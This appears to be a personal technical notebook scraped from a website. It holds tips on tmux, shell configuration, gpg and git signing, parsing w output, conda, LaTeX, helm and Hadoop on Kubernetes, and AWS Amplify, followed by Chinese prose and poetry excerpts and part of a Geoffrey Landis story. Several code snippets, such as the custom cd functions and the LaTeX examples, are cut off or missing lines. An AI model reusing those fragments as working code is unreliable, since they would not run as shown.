qShow pane number, and before the numbers disappear, you can switch to that pane by typing the number
{Swap forward current pane
}Swap backward current pane
Ctrl+oSwap all the panes in current window clockwise
arrowMove to the pane pointed by the arrow key (intuitive!)
oSwitch to the next (pane number order) pane
tShow a clock :)


Change command prefix

The default command prefix Ctrl-b is not a very good key binding: they are too far away! My choice is to change it to Ctrl-a, but it could be set to any keybinding you like.

We should use Ctrl-b and then type : to enter the command line mod and enter the following lines

set -g prefix C-a
unbind C-b
bind C-a send-prefix

My current favorite prefix is the grave accent (`), but this kinda hinders editing markdown in tmux.

If you would like to set it permanently, it is wise to create a ~/.tmux.conf, it functions just like your .bashrc and other dotfiles. If you

Since tmux 1.6, it is possible to set a second prefix by the following command:

set -g prefix2 <your-key-binding>

To apply changes, you need to source the configuration file:

tmux source-file ~/.tmux.conf


set -g default-terminal "screen-256color"
# or
set -g default-terminal "xterm-256color"

Rotate panes

CmdP space: (bound to next-layout by default) will cycle through available layouts.

Bug fixes

tmux session wrongly captures Home and End keys

Add the following lines to your ~/.tmux.conf:

bind-key -n Home send Escape "OH"
bind-key -n End send Escape "OF"



For .bashrc, .zshrc, .profile, or even Microsoft.PowerShell_profile.ps1).


Know if I'm in WSL or native Linux

Simply check the content of /proc/version. WSLs will contain "Microsoft / microsoft" somewhere in the kernel build version (which is very interesting to me lol).

On WSL (running Ubuntu 18.04):

$ cat /proc/version
Linux version 4.19.128-microsoft-standard (oe-user@oe-host) (gcc version 8.2.0 (GCC)) #1 SMP Tue Jun 23 12:58:10 UTC 2020

Also, on WSL with Kali Linux:

$ cat /proc/version
Linux version 4.4.0-22000-Microsoft (Microsoft@Microsoft.com) (gcc version 5.4.0 (GCC) ) #653-Microsoft Wed Apr 27 16:06:00 PST 2022

On native Linux (here Debian 11 bullseye)

$ cat /proc/version
Linux version 5.10.0-13-amd64 (debian-kernel@lists.debian.org) (gcc-10 (Debian 10.2.1-6) 10.2.1 20210110, GNU ld (GNU Binutils for Debian) 2.35.2) #1 SMP Debian 5.10.106-1 (2022-03-17)

List files in a directory after cd

Unix shells:

function cd {
    builtin cd "$@"
    if [ $(ls | wc -l) -le 50 ]; then
        ls -F --color=auto
        echo "There are a total of $(ls -F | wc -l) entries in $(pwd)"


Function cd_custom {
    set-location @Args
    $numObj = 0
    $regex_opts = ([System.Text.RegularExpressions.RegexOptions]::IgnoreCase -bor [System.Text.RegularExpressions.RegexOptions]::Compiled)
    $hidden = New-Object System.Text.RegularExpressions.Regex('^\.', $regex_opts)

    get-childitem -n | foreach-object { if (!($hidden.IsMatch($_))) { $numObj++ } }
    if ( $numObj -le 30 ) {
    else {
        Write-Output "There are a total of $numObj entries in $((Get-Location).path)"

set-alias -Name cd -Value cd_custom -Option AllScope

.zshrc specific contents

Save history between sessions

Add those lines to ~/.zshrc:

export HISTFILE=~/.zsh_history # follow the convention of bash
export HISTSIZE=10000
export SAVEHIST=10000
setopt appendhistory

Also see this discussion in WSL gh issues, histories might not be saved if the session is not closed gracefully.

General tip is: always use exit or Ctrl+D.

Home and End wrongly captured by zsh

See [1] in Reference.

Run cat then press keys to see the codes your shortcut send and...

Add the key bindings to ~/.zshrc using bindkey. For example:

bindkey  "^[[1~"  beginning-of-line

PowerShell specific contents

bash-like ls

See my gist.


  1. ubuntu - Fix key settings (Home/End/Insert/Delete) in .zshrc when running Zsh in Terminator Terminal Emulator - Stack Overflow



List keys

$ gpg --list-secret-keys --keyid-format LONG
sec   rsa4096/20732A67E8F95BD9 2020-12-02 [SC]
uid                 Mischa "Matchy" Volynskaya
ssb   rsa4096/DABE372E78DCA377 2020-12-02 [E]

Export keys

$ gpg --export-secret-keys -a --output secretkey

Import keys (from the secretkey generated)

gpg --import secretkey

git gpg sign


Config signing key

git config --global user.signingkey <key id>

On (hopefully most) Linux distro the <key id> can be tab-completed. Unfortunately not possible for Windows PowerShell :(

Sign a single commit

git commit -S -m "commit message"

Always sign

git config --global commit.gpgsign true

Trouble shooting

If you receive errors like secrete key not available or no secret key (one example shown below), it is possible that the gpg program used by your git is different from your system's default gpg. Thus, the secret key was only imported to the system gpg, but is still unknown to git's gpg.

$ git commit -m "Test"
gpg: skipped "<key id>": No secret key
gpg: signing failed: No secret key
error: gpg failed to sign the data
fatal: failed to write commit object

To solve this issue, we need to configure git's gpg program to that with your secret key imported.

Run which gpg (*nix shells) or Get-Command gpg (PowerShell) to find that path to your system default gpg program.

$ which gpg
$ Get-Command gpg

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Application     gpg.exe                                   C:\Program Files (x86)\gnupg\bin\gpg.exe

Configure git to use the output (*nix shell) or the path listed in column Source (Powershell)

git config --global gpg.program "C:\Program Files (x86)\gnupg\bin\gpg.exe"

Alternatively, you can run this one-liner

git config --global gpg.program "$(which gpg)"
git config --global gpg.program (Get-Command gpg).Source

(Windows) commit signing takes too long

If you are using gpg on Windows, you might have noticed that signing a commit takes a long time. This is because gpg is trying to use the gpg-agent to cache the passphrase. However, the gpg-agent is not started by default on Windows. To solve this issue, you can start the gpg-agent by running the following command:

gpg-connect-agent /bye

You can also add this command to your Microsoft.PowerShell_profile.ps1 file to start the gpg-agent automatically when you start PowerShell.

Add-Content $PROFILE -Value "gpg-connect-agent /bye"

Or you can add a shortcut to gpg-connect-agent to your startup folder (e.g. C:\Users\<user-name>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup)


The output format of w

w command shows who is logged on and what they are doing.

A typical output of w looks like this (the output is generated by copilot)

$ w
 23:02:30 up  1:01,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
jason    tty7     :0               22:01    1:01m  1.01s  1.01s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu

The effect of flags such as -s are well explained in other places, so I will not repeat them here. However, for someone who's interested in parsing the output of w, the following information might be useful. -- you can always refer to the source code but I bet it would be better to have a quick reference here.


The TTY column shows the terminal name of the terminal the user is logged in on. It is very powerful -- it can distinguish between local terminal and pseudo-terminal, combining the info in FROM it can also distinguish between different pseudo-terminals (details later).

Different types of terminals are represented by different characters:

  • tty: A tty is a native terminal device, the backend is either hardware or kernel emulated.
  • pts: A pty (pseudo terminal device) is a terminal device which is emulated by an other program (example: xterm, screen, or ssh are such programs). A pts is the slave part of a pty. Most of the cases, it means the user is logged in via ssh or screen.
  • :0: A display is managed by a display manager (like gdm, kdm, or xdm). A display is NOT a terminal, but it can spawn terminals on request. (It does not have to be 0, if you have multiple displays, you will see :1, :2 etc.)

The number following pts or tty is the number of the terminal. For example, tty7 is the seventh terminal, pts/0 is the first pseudo-terminal.


The FROM column shows where the user logged in from. It is a string, and it can be:

  • :0: The user is logged in from a display manager.
  • IP address: The user is logged in from a remote machine via ssh.
  • Starts with :pts/0: Usually means that this is a xterm or screen session.
  • Starts with tmux(114514): Definitely a tmux session.


Their outputs are all foramtted using print_time_ival7 function. I'll use python-like pseudocode to explain.

if idle_time <= 60s:
    output "{seconds}.{centiseconds}s" # e.g. 3.05s
    # first number will not be zero padded, but the second number will be
elif idle_time > 60s and idle_time < 1 hour:
    output "{minutes}:{seconds}" # e.g. 1:03
    # first number will not be zero padded, but the second number will be
elif idle_time >= 1 hour and idle_time < 2days:
    output "{hours}:{minutes}m" # e.g. 1:03m
    # first number will not be zero padded, but the second number will be
elif idle_time >= 2 days:
    output "{days}days" # e.g. 2days

So if you want to parse idle time / JCPU / PCPU, one should first check according to whether the string contains days, m, s or : and then decide how to parse it.


if current_time - login_time > 12 hours and login_time.day_in_the_year is not today:
    if current_time - login_time > 6 days:
        output "{day}{month}{year}" # e.g. 07Aug23
        # the year is actually calculated by number of years from 1900 modulo 100
        output "{weekday}{hour}" # Wed08
        # the hour is in 24-hour format
    output "{hour}:{minute}" # 03:02
    # the hour is in 24-hour format
    # both numbers will be zero padded

To parse this, one could possibly use the length of the string to first determine whether it is in day-month-year format (7 in length). If it's 5 in length, then one could check whether it contains : to determine whether it's in hour-minute format or weekday-hour format.

Git (not 101)


git pull stuck at "Receiving objects"/"Unpacking objects"

git fsck && git gc --prune=now

Or if on Windows 11:

git config --global core.sshCommand "C:/Windows/System32/OpenSSH/ssh.exe"

i.e. use the built-in ssh.exe instead of the one packaged with Git for Windows.

Also see gpg - trouble shooting chapter for gpg signing related issues.

Basically, things shipped with Git for Windows are evil, always consider using the system default / your customed download!


  1. ssh - Git fetch/pull/clone hangs on receiving objects - Stack Overflow
  2. github - git stuck on Unpacking Objects phase - Stack Overflow

General Python-related notes

Cannot pickle TextIOWrapper objects

Do not use multiprocessing in combination with tqdm. Turns out the tqdm progress bar is not picklable.

Version and package management


TODO: plain venv, conda, poetry, pyenv, pyenv-virtualenv, pdm comparison

conda and conda-like

  • conda is a package manager that also manages virtual environments.
  • mamba is a faster drop-in replacement for conda.

They both have their full-fledged version and "mini" version, e.g. anaconda and miniconda / mambaforge and miniforge.

Migrate condainstallation to a different directory

At installation, it's possible to select the directory where the environment will be stored.

After installation:

  1. Simply move the $HOME/miniconda3 (default installation) to the new directory.
  2. Open /path/to/new/dir/miniconda3/condabin/conda and change the !/$HOME/miniconda3/python to !/path/to/new/dir/miniconda3/python.
  3. Run /path/to/new/dir/miniconda3/condabin/conda init to update the shell initialization script.

Usually this will be enough. If not, you might need to update the PATH variable in the shell initialization script.

Use libmamba solver for conda

# need conda > 22.11
conda update -n base -c defaults conda
conda install -n base conda-libmamba-solver
conda config --set solver libmamba

VSCode tips

Platform specific settings

I asked the following questions in my personal Telegram group one day...


And my friend FluorineDog enlightened me that the ${env:variable} syntax could be a workaround.

E.g. create an environment variable in the name of EXE_HOME and use the platform-specific executable in the form of ${env:EXE_HOME}/<executable>.

But that's not necessary for LaTeX workshop...

But I actually only want to solve the compilation problem of my $\LaTeX$ workshop: I sometimes compile locally on my personal laptop, which has ; and sometimes on a server w/ Debian 11. The solution for my problem is actually simple: set up TEXMFHOME on each machine.

To be specific, add the following line in your .bashrc or .zshrc or .whatever-rc:

export TEXMFHOME="/path/to/your/latexmk"

Change VSCode Remote installation directory

Use remote.SSH.serverInstallPath to change the installation directory of the VSCode Remote extension.

Important if: 1. you have a small root partition; 2. you want to install the extension on a network drive.

{ // settings.json
    // ...
    "remote.SSH.serverInstallPath": {
        "work": "/test/location", // foramt:  "hostname": "/path/to/install"
        "home": "/foobar"
    // ...

JetBrains IDEs tips


Change remote IDE installation directory

Change the installation options here:

Change installation options

General LaTeX tricks

一些我还没有熟练掌握的 \(\LaTeX\) 技巧

在 math environment 里 format 字体


% preamble
% ...


% ...
% end of preamble

% ...



pdfpages: insert pdf pages in a \(\LaTeX\) file

对于做 take-home exam 有奇效。

% preamble
% ...


% ...
% end of preamble

% ...

% include all pages

% include certain pages (here 1, 3, 5)


datetime2: foramt datetime :)

Set up new date style

The 4 input parameters for \DTMdisplaydate are 1. year, 2. month, 3. date, 4. dow. The package asks the users to refer to the input parameters using a double-hash + param number. Thus, while designing the format string, we should refer to year by ##1, month by ##2 and date by ##3.

\DTMnewdatestyle{kordate}% label, just a token
{% definitions
        % format string
        \number##1년 \number##2월 \number##3일
    \renewcommand*{\DTMDisplaydate}{\DTMdisplaydate} %Capitalize

Also note that, any fragile command used by the format string (inside \renewcommand) should be wrapped with \protect. An example in the (not so easy to read documentation of datetime2) below:

% omitted preamble
        \DTMmonthname{##2} \ordinalnum{##2}, \number##1 }%

    \section{\today: an example}

This document can’t compile properly and causes the error:

! Argument of \@sect has an extra }.
<inserted text>

This is because the style definition has made \today fragile because it uses an unprotected fragile command. This can be fixed by protecting \ordinalnum in the style definition.

LaTeX Workshop

LaTeX workshop formatter

Utilize latexindent on Debian/Ubuntu.

It is a Perl script depending on YAML::Tiny and File::HomeDir. Be sure to install the deps through cpan:

sudo cpan YAML::Tiny File::HomeDir

在 kubernetes 集群部署 hadoop


使用 helm 安装

下载 helm

curl https://baltocdn.com/helm/signing.asc | sudo apt-key add -
sudo apt-get install apt-transport-https --yes
echo "deb https://baltocdn.com/helm/stable/debian/ all main" | sudo tee /etc/apt/sources.list.d/helm-stable-debian.list
sudo apt-get update
sudo apt-get install helm

Create a chart

helm create mychart

默认的 chart 是个 nginx web server。可以部署上去看看

Install a chart

helm install mychart-release-name mychart
export POD_NAME=$(kubectl get pods --namespace default -l "app.kubernetes.io/name=mychart-release-name,app.kubernetes.io/instance=cluster-name" -o jsonpath="{.items[0].metadata.name}")
export CONTAINER_PORT=$(kubectl get pod --namespace default $POD_NAME -o jsonpath="{.spec.containers[0].ports[0].containerPort}")
echo "Visit to use your application"
kubectl --namespace default port-forward $POD_NAME 8080:$CONTAINER_PORT

Uninstall chart

$ helm list
NAME                     NAMESPACE       REVISION        UPDATED                                 STATUS          CHART           APP VERSION
mychart-release-name     default         1               2020-12-05 18:53:26.6995927 +0900 KST   deployed        mychart-0.1.0   1.16.0
helm uninstall mychart-release-name

Can also be done by delete del un.

Install hadoop chart

To install the chart with the release name hadoop that utilizes 50% of the available node resources:

helm install hadoop stable/hadoop

This command will deploy at least 4 pods on your cluster according to the default settings.

  1. hdfs namenode pod
  2. hdfs datanode
  3. yarn resource manager
  4. yarn name manager


  1. You can check the status of HDFS by running this command:

    kubectl exec -n default -it hadoop-hadoop-hdfs-nn-0 -- hdfs dfsadmin -report
  2. You can list the yarn nodes by running this command:

    kubectl exec -n default -it hadoop-hadoop-yarn-rm-0 -- yarn node -list
  3. Create a port-forward to the yarn resource manager UI:

    kubectl port-forward -n default hadoop-hadoop-yarn-rm-0 8088:8088

    Then open the ui in your browser:

    open http://localhost:8088
  4. You can run included hadoop tests like this:

    kubectl exec -n default -it hadoop-hadoop-yarn-nm-0 -- hadoop jar /usr/local/hadoop/share/hadoop/mapreduce/hadoop-mapreduce-client-jobclient-2.9.0-tests.jar TestDFSIO -write -nrFiles 5 -fileSize 128MB -resFile /tmp/TestDFSIOwrite.txt
  5. You can list the mapreduce jobs like this:

    kubectl exec -n default -it hadoop-hadoop-yarn-rm-0 -- mapred job -list
  6. This chart can also be used with the zeppelin chart

    helm install --namespace default --set hadoop.useConfigMap=true,hadoop.configMapName=hadoop-hadoop stable/zeppelin
  7. You can scale the number of yarn nodes like this:

    helm upgrade hadoop --set yarn.nodeManager.replicas=4 stable/hadoop

    Make sure to update the values.yaml if you want to make this permanent.

Edit helm release

helm upgrade -f new-values.yml {release name} {package name or path} --version {fixed-version}

AWS Amplify 踩坑记录🕳

我也不知道这算不算 DevOps

试图从 staging clone 出一个配置一样的 dev 环境


Amplify backend 已有 staging,想直接再 Amplify Console clone 失败了, 出来一份空的 :/

在本地有 staging backend 配置表的分支 development 上拉取 dev environment:

amplify pull --appId <appId> --envName dev

之后进行 push,提示 HostedUIProvidersCustomResourceInputs update 失败。

Embedded stack arn:aws:cloudformation:<myapp> was not successfully updated. Currently in UPDATE_ROLLBACK_IN_PROGRESS with reason: The following resource(s) failed to update: [HostedUIProvidersCustomResourceInputs].

谷歌到 这个 issue,提示可能是 tream-provider-info.json 里缺 auth 内容。看了一下果然是空的。

在 JSON 里添加 auth 相关字段。

  "categories": {
      "auth": {
        "<appName>": {
          "userPoolId": "...",
          "userPoolName": "...",
          "webClientId": "...",
          "nativeClientId": "..."

再次 amplify push, 提示 [webClientId, nativeClientId, userPooId] does not exist in the template

UPDATE_FAILED auth<appName> AWS::CloudFormation::Stack <TIME> Parameters: [webClientId, nativeClientId, userPoolId] do not exist in the template

重新阅读上面提到的 issue,在对话里翻出 这么一条:原因是切换环境之后 $HOME directory 下 .aws 的 global settings 中 Amplify 的 deployment-secrets.json 没有正确 fetch 到。这又是 @aws-amplify/cli 更新到新版本之后的改动……


$HOME/.aws/amplify/deployment-secrets.json 中把对应社交平台的 [ProvidersCustomResourceInputs]clientIDclientSecrets 填好(哪怕是 dummy ID & secrets 也行得通,只要不是空的),就能正常 deploy 了。


  1. 真的不要随便升级 amplify cli
  2. 创建 resource 一定要在本地,改动则不要在本地,要在 web console……

Debug Amplify admin UI

If you ever encounter any error in your Amplify Admin UI, it's useful to open the debug view in your browser and checkout the console.

Amplify Admin UI error

In Chrome just press F12. There will be some usefull messages concerning what is wrong when Amplify tried to send request to the components in your app.

Browser Debug Console

Here I have some Uncaught error in one of the items in my DynamoDB...

Amplify 7.6.x graphql api migration

Update from 7.5.x to 7.6.x will break the models created before since they Amplify team introduced new directives.

Run the follwing command to migrate API.

$ amplify migrate api

Previously you would have to create a “join table” manually between two models and create hasMany relationships from both models into that join table as a work around for this feature. With the new transformer, you can specify a @manyToMany relationship between the models and Amplify CLI will create the join tables behind the scenes.

However, currently (01/01/2022) AWS Amplify DOES NOT successfully support migration of existing joint table.

If you have a schema.graphql like this:

type Student @model @auth(rules: [{allow: private}]) {
  id: ID!
  email: AWSEmail
  email_verified: Boolean
  name: String
  profile: ID
  role: String
  ClassJoined: [StudentClass] @hasMany(indexName: "byStudent", fields: ["id"])
  ArtWorks: [ArtWork] @hasMany(indexName: "byStudent", fields: ["id"])
  Comments: [Comment] @hasMany(indexName: "byStudent", fields: ["id"])

type Class @model @auth(rules: [{allow: private}]) {
  id: ID!
  name: String!
  description: String!
  startDate: AWSDateTime
  students: [StudentClass] @hasMany(indexName: "byClass", fields: ["id"])
  teacherID: ID @index(name: "byTeacher")

type StudentClass @model(queries: null) @auth(rules: [{allow: private}]) {
  id: ID!
  studentID: ID! @index(name: "byStudent", sortKeyFields: ["classID"])
  classID: ID! @index(name: "byClass", sortKeyFields: ["studentID"])
  student: Student! @belongsTo(fields: ["studentID"])
  class: Class! @belongsTo(fields: ["classID"])

Unfortunately we have two @index, and Amplify fails to find the second (here byClass).

修理 hexo-douban

在新博客使用了 hexo-douban 这个库,想展示自己的豆瓣阅读、观影等等。但是生成的豆瓣页在 Fluid 主题下图片显示有点问题,需要手动改 css 来解决;同时装了 bluebird 又检测到几处 TypeError,需要修改 js 源码。 原作者已经没有精力维护这个库了,npm 肯定不会更新,而我又依赖 GitHub Actions 来部署。如何应用自己的手动修改是个问题。

使用 patch-package 给包打补丁

这里推荐个小工具 patch-package。就是给依赖库打个补丁,不影响依赖库正常升级,只是涉及到你修改的内容会用你的补丁替换。

直接在依赖库中编辑修复有 bug 的文件,然后该工具会生成个临时文件夹存放对应版本的依赖库,然后和你修改的依赖库目录去进行比较,生成一个 patch 文件,下次在执行 npm install 时,该工具会将该 patch 合进该依赖库去。


  1. 项目的根目录 package.json 下,添加 npm postinstall, 以便每次执行 npm install 时能合进所有的patch文件:

    "scripts": {
    +  "postinstall": "patch-package"
  2. 安装 patch-package

    npm i patch-package --save
  3. 编辑依赖库 <package-name>, 并执行下面命令生成 patch 文件

    npx patch-package <package-name>
  4. 再执行以下命令,你就发现最新安装的包已经合进了你刚刚修改的 patch 文件了

    npm install


  1. JeanZhao: 修改node_modules中依赖库

群友教我写 js


this in js

I defined a class called PictureStore which contains a property rootStore and has a function uploadPicture(). Inside uploadPicture(), I need to access rootStore to retrieve some properties.

At first I defined them in this way:

class PictureStore {
  rootStore : RootStore;
  ... // omitted
  async uploadPicture() {
    ... // omitted
    let something = this.rootStore.doSomething();
    ... // omitted
  ... // omitted

Unfortunately I received Unhandled TypeError, which claimed that rootStore is undefined.

Master Bai told me to re-write the definition of uploadPicture() in this way:

class PictureStore {
rootStore : RootStore;
  ... // omitted
  uploadPicture = async () => {
    ... // omitted
    let something = this.rootStore.doSomething();
    ... // omitted
  ... // omitted

which fixed the bug nicely.

The reason is that this in js works weirdly (well, in my opinion).

MDN's document about this explains nicely about everything related to this. I'll extract the contents related to my bug here:

In strict mode (which is the mode my application uses), if the value of this is not set when entering an execution context, it remains as undefined. However, in arrow functions (to understand it naively, they are functions in the form of var fun = () => {}), this retains the value of the enclosing lexical context's this , that is, the this of arrow functions inside a class will be resolved to the class's this.

Literature Excerpts



百万书库 - 萧红散文













































这回祖父不坐在玻璃窗里,是睡在堂屋的板床上,没有灵魂的躺在那里。 我要看一看他白色的胡子,可是怎样看呢!拿开他脸上蒙着的纸吧,胡子、眼睛和嘴,都不会动了,他真的一点感觉也没有了?我从祖父的袖管里去摸他的手,手也没有感觉了。祖父这回真死去了啊!

祖父装进棺材去的那天早晨,正是后园里玫瑰花开放满树的时候。 我扯着祖父的一张被角,抬向灵前去。吹鼓手在灵前吹着大喇叭。




过去的十年我是和父亲打斗着生活。在这期间我觉得人是残酷的东西。 父亲对我是没有好面孔的,对于仆人也是没有好面孔的,他对于祖父也是没有好面孔的。因为仆人是穷人,祖父是老人,我是个小孩子,所以我们这些完全没有保障的人就落到他的手里。后来我看到新娶来的母亲也落到他的手里,他喜欢她的时候,便同她说笑,他恼怒时便骂她,母亲渐渐也怕起父亲来。

















































泥泞的街道,沿路的屋顶和蜂巢样密挤着,平房屋顶,又生出一层平屋来。那是用板钉成的,看起像是楼房,也闭着窗子,歇着门。可是生在楼房里的不像人,是些猪猡,是污浊的群。 我们往来都看见这样的景致。现在街道是泥泞了,肚子是叫唤了!一心要奔到苍蝇堆里,要吃馒头。 桌子的对边那个老头,他唠叨起来了,大概他是个油匠,胡子染着白色,不管衣襟或袖口,都有斑点花色的颜料,他用有颜料的手吃东西。并没能发现他是不讲卫生,因为我们是一道生活。




















送牛奶的人,轻轻带着白色的、发热的瓶子,排在房间的门外。这非常引诱我,好象我已嗅到“列巴圈”的麦香,好象那成串肥胖的圆形的点心,已经挂在我的鼻头了。 几天没有饱食,我是怎样的需要啊!胃口在胸膛里面收缩,没有钱买,让那“列巴圈”们白白在虐待我。















可是,立刻受了打击,我眼看着那人从郎华的手上把面包夺回去,五个“列巴圈”也夺回去。 “明早一起取钱不行吗?”

































家庭教师还没有下课,菜和米香引我回到炉前再吃两口,用匙子调一下饭,再调一下菜,很忙的样子象在偷吃。 在地板上走了又走,一个钟头的课程还不到吗?于是再打开锅盖吞下几口。再从小窗望一望。我快要吃饱的时候,他才回来。习惯上知道一定是他,他都是在院心大声弄着嗓子响。我藏在门后等他,有时候我不等他寻到,就作着怪声跳出来。





圆月从东边一小片林梢透过来,暗红色的圆月,很大很混浊的样子,好象老人昏花的眼睛,垂到天边去。 脚下的雪不住在滑着,响着,走了许多时候,一个行人没有遇见,来到火车站了!大时钟在暗红色的空中发着光,火车的汽笛震鸣着冰寒的空气,电车,汽车,马车,人力车,车站前忙着这一切。


从岗上望下来,最远处,商店的红绿电灯不住地闪烁;在夜里的人家好象在烟里一般;若没有灯光从窗子流出来,那么所有的楼房就该变成幽寂的、没有钟声的大教堂了! 站在岗上望下去,“许公路”的电灯,好象扯在太阳下的长串的黄色铜铃,越远,那些铜铃越增加着密度,渐渐数不过来了!

挨着走,昏昏茫茫地走,什么夜,什么市街,全是阴沟,我们滚在沟中。携着手吧!相牵着走吧! 天气那样冷,道路那样滑,我时时要滑倒的样子,脚下不稳起来,不自主起来,在一家电影院门前,我终于跌倒了,坐在冰上,因为道上无处不是冰。膝盖的关节一定受了伤害,他虽拉着我,走起来也十分困难。“肚子跌痛了没有?你实在不能走了吧?”












Poetry Excerpts













这时上帝死了 乌云降落下来































Had I Not Seen The Sun

Emily Dickinson

Had I not seen the Sun
I could have borne the shade
But Light a newer Wilderness
My Wilderness has made—


Neil Hilborn

本诗被用作 Rous - H.E.R 的人声采样

When she said she loved me her mouth was a straight line,
She told me that I was taking up too much of her time
Last week she started sleeping at her mother's place
She told me that she shouldn't have let me get so attached to her;
that this whole thing was a mistake, but...
How can it be a mistake that i don't have to wash my hands after I touched her?
Love is not a mistake, and it's killing me that she can run away from this and I just can't,
I can't — I can't go out and find someone new because I always think of her,
Usually, when I obsess over things, I see germs sneaking into my skin.
I see myself crushed by an endless succession of cars...
And she was the first beautiful thing I ever got stuck on.
I want to wake up every morning, thinking about the way she holds her steering wheel...
How she turns shower knobs like she's opening a safe.
How she blows out candles—
blows out candles—
blows out candles—
blows out candles—
blows out candles—
blows out...
Now, I just think about who else is kissing her,
I can't breathe because he only kisses her once — he doesn't care if it is perfect
I want her back, so bad...
I leave the door unlocked.
I leave the lights on.







Geoffrey A. Landis short fictions

List scraped from CSFDB.

Online reading resources are most from 九九藏书网 (Chinese), 月光博客 (Chinese) , chinasf(Chinese). Struggled to find proper eBook resources :(

Update 2024: I bought a second-handed copy of "Impact Parameter" from a local bookstore during my internship in the States. I'll transcribe some of the stories in this website.

titleenglish titleread?
真空态Vacuum States
空中的大海The River of Air, the Ocean of Sky
狄拉克海上的涟漪Ripples in the Dirac Sea
追赶太阳A Walk in the Sun
时空的插曲Interlude at the Circus
冲击参数Impact Parameter
拥抱异类Embracing the Alien
在冬天的星星下Beneath the Stars of Winter
黄蜂的奇特习性The Singular Habits of Wasps
我们在国家航空航天局干什么What We Really Do Here at NASA
初始时间Time Prime
罗尔维克的战争Rorvik's War
穿过黑暗Across the Darkness
黑妇人Dark Lady
最后的日落The Last Sunset
车轮上的死亡较量Hot Death on Wheels
冬天的炮火Winter Fire
逼近黑斑Approaching Perimelasma
遭遇太空海盗Outsider's Chance
进入蓝色深渊Into the Blue Abyss
漫长的追捕The Long Chase
坠落火星Falling Onto Mars
剑鱼座故事At Dorado
懒汉泰克斯Lazy Taekos
镜中人The Man in the Mirror
云城之主The Sultan of the Clouds
南极酒店A Hotel in Antarctica

Ripples in the Dirac Sea

My death looms over me like a tidal wave, rushing toward me with an inexorable slow-motion majesty. And yet I flee, pointless though it may be.

I depart, and my ripples diverge to infinity, like waves smoothing out the footprints of forgotten travellers.

We were so caeful to avoid any paradox, the day we first tested my machine. We pasted a duct-tape cross onto the concrete floor of a windowless lab, placed an alarm clock on the mark, and locked the door. An hour later we came back, removed the clock, and put the experimental machine in the room with a super-eight camera set in the coils. I aimed the camera at the X, and one of my grad students programmed the machine to send the camera back half an hour, stay in the past five minutes, then return. It left and returned without even a flicker. When we developed the film, the time on the clock was half an hour before we loaded the camera. We'd succeeded in opening the door into the past. We celebrated with coffee and champagne.

Now that I know a lot more about time, I understand our mistake, that we had not thought to put a movie camera in the room with the clock to photograph the machine as it arrived from the future. But what is obvious to me now was not obvious then.

I arrive, and the ripples converge to the instant now from the vastness of the infinite sea.

To San Francisco, June 8, 1965. A warm breeze riffles across dandelion-speckled grass, while puffy white clouds form strange and wondrous shapes for our entertainment. Yet so very few people pause to enjoy it. They scurry about, diligently preoccupied, believing that if they act busy enough, they must be important. "They hurry so," I say. "Why can't they slow down, sit back, enjoy the day?"

"They're trapped in the illusion of time," says Dancer. He lies on his back and blows a soap bubble, his hair flopping back long and brown in a time when "long" hair meant anything below the ear. A puff of breeze takes the bubble down the hill and into the stream of pedestrians. They uniformly ignore it. "They're caught in the belief that what they do is important to some future goal." The bubble pops against a briefcase, and Dancer blows another. "You and I, we know how false an illusion that is. There is no past, no future, only the now, eternal."

He was right, more right than he could have possibly imagined.

Once I, too, was preoccupied and self-important. Once I was brilliant and ambitious. I was twenty-eight years old, and I made the greatest discovery in the world.

From my hiding place I watched him come up the service elevator. He was thin almost to the point of starvation, a nervous man with stringy blond hair and an armless white T-shirt. He looked up and down the hall, but failed to see me hidden in the janitor's closet. Under each arm was a two-gallon can of gasoline, in each hand another. He put down three of the cans and turned the last one upside down, then walked down the hall, spreading a pungent trail of gasoline. His face was blank. When he started on the second can, I figured it was about enough. As he passed my hiding spot, I walloped him over the head with a wrench, and called hotel security. Then I went back to the closet and let the ripples of time converge.

I arrived in a burning room, flames licking forth at me, the heat almost too much to bear. I gasped for breath—a mistake—and punched at the keypad.

Notes on the Theory and Practice of Time Travel:

  1. Travel is possible only into the past.
  2. The object transported will return to exactly the time and place of departure.
  3. It is not possible to bring objects from the past to the present.
  4. Actions in the past cannot change the present.

One time I tried jumping back a hundred million years, to the Cretaceous, to see dinosaurs. All the picture books show the landscape as being covered with dinosaurs. I spent three days wandering around a swamp—in my new tweed suit—-before catching even a glimpse of any dinosaur larger than a basset hound. That one—a theropod of some sort, I don't know which—skittered away as soon as it caught a whiff of me. Quite a disappointment.

My professor in transfinite math used to tell stories about a hotel with an infinite number of rooms. One day all the rooms are full, and another guest arrives. "No problem," says the desk clerk. He moves the person in room one into room two, the person in room two into room three, and so on. Presto! A vacant room.

A little later, an infinite number of guests arrive. "No problem," says the dauntless desk clerk. He moves the person in room one into room two, the person in room two into room four, the person in room three into room six, and so on. Presto! An infinite number of rooms vacant.

My time machine works on just that principle.

Again I return to 1965, the fixed point, the strange attractor to my chaotic trajectory. In years of wandering I've met countless people, but Daniel Ranien—Dancer—was the only one who truly had his head together. He had a soft, easy smile, a battered secondhand guitar, and as much wisdom as it has taken me a hundred lifetimes to learn. I've known him in good times and bad, in summer days with blue skies that we swore would last a thousand years, in days of winter blizzards with drifted snow piled high over our heads. In happier times we have laid roses into the barrels of rifles; we have laid our bodies across the city streets in the midst of riots, and not been hurt. And I have been with him when he died, once, twice, a hundred times over.

He died on February 8, 1969, a month into the reign of King Richard the Trickster and his court fool Spiro, a year before Kent State and Altamont and the secret war in Cambodia slowly strangled the summer of dreams. He died, and there was—is—nothing I can do. The last time he died I dragged him to a hospital, where I screamed and ranted until finally I convinced them to admit him for observation, though nothing seemed wrong with him. With X rays and arteriograms and radioactive tracers, they found the incipient bubble in his brain; they drugged him, shaved his beautiful long brown hair, and operated on him, cutting out the offending capillary and tying it off neatly. When the anesthetic wore off, I sat in the hospital room and held his hand. There were big purple blotches under his eyes. He gripped my hand and stared, silent, into space. Visiting hours or no, I didn't let them throw me out of the room. He just stared. In the gray hours just before dawn he sighed softly and died. There was nothing at all that I could do.

